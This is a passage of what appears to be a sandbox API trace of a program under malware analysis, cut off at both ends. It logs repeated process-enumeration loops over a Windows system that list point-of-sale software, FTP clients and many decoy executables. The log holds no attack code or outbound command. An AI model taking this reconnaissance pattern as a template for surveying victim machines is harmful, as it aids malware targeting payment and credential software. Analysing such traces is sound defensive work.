out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0193.003] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0193.005] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0193.006] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0193.008] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0193.009] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0193.047] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0193.049] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0193.051] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0193.053] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0193.054] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0193.056] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0193.058] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0193.060] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0193.061] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0193.063] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0193.065] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0193.069] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0193.070] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0193.072] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0193.074] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0193.076] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0193.077] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0193.079] CloseHandle (hObject=0x17ec) returned 1 [0193.079] Sleep (dwMilliseconds=0x64) [0193.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.095] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.097] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0193.099] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0193.100] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.102] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0193.103] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.106] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0193.108] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0193.110] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0193.112] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.113] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.115] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0193.117] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.118] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.120] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.121] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.123] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.125] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.130] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.132] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0193.134] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0193.135] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.137] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0193.139] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.140] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0193.142] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0193.148] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0193.150] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0193.153] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0193.155] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0193.157] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.159] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.160] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0193.162] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.164] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0193.165] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.167] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0193.168] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0193.170] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0193.171] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0193.173] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0193.174] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0193.176] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0193.177] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0193.179] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0193.180] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0193.182] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0193.185] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0193.187] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0193.189] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0193.191] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0193.193] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0193.194] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0193.196] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0193.198] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0193.199] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0193.201] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0193.203] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0193.205] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0193.207] Process32Next (in: 